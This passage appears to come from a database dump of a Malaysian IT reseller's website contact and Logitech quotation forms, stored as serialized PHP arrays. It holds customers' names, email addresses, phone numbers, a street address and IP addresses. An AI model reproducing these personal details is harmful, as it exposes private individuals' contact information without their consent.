soon.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-15 11:10:52','121.122.49.29','1'),(191,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Thomas Hoong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"khunthomas89@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122057023\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"RSTC\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"22A, PJU 1A/43B\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:60:\"Logitech H570e Headset, SmartDock Extender Box, Screen Share\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Do you have hybrid phone?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"89\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-16 03:51:38','14.192.215.203','1'),(192,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Josephine Goh\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"josephine@cuckoo.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129027951\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"Cuckoo International (MAL) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Logitech Connect, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:133:\"Hi, I would like to request a quotation for Logitech C930e. Appreciated if you can send us the quotation as soon as possible. Thanks.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-16 15:34:48','211.24.114.69','1'),(193,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Daniel Tan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"tan.tzekok@kimteckcheong.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0168101549\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"Kim Teck Cheong Consolidated Berhad\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Request for video conferencing quotation\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-19 07:04:27','115.164.61.123','1'),(194,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Monica R\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"monica@tm.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0138161967\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"TM\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"554 jalan song Tabuan Height\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"please email me for group of 10 person on vc\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"00\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-20 09:04:02','210.186.80.103','1'),(195,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Monica R\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"monica@tm.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0138161967\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"TM\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"554 jalan song Tabuan Height\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"please email me for group of 10 person on vc\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"00\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-20 09:05:27','210.186.80.103','1'),(196,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Monica R\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"monica@tm.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0138161967\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"TM\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"554 jalan song Tabuan Height\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"please email me for group of 10 person on vc\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"00\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-20 09:05:29','210.186.80.103','1'),(197,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Monica R\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"monica@tm.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0138161967\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"TM\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"554 jalan song Tabuan Height\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"please email me for group of 10 person on vc\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 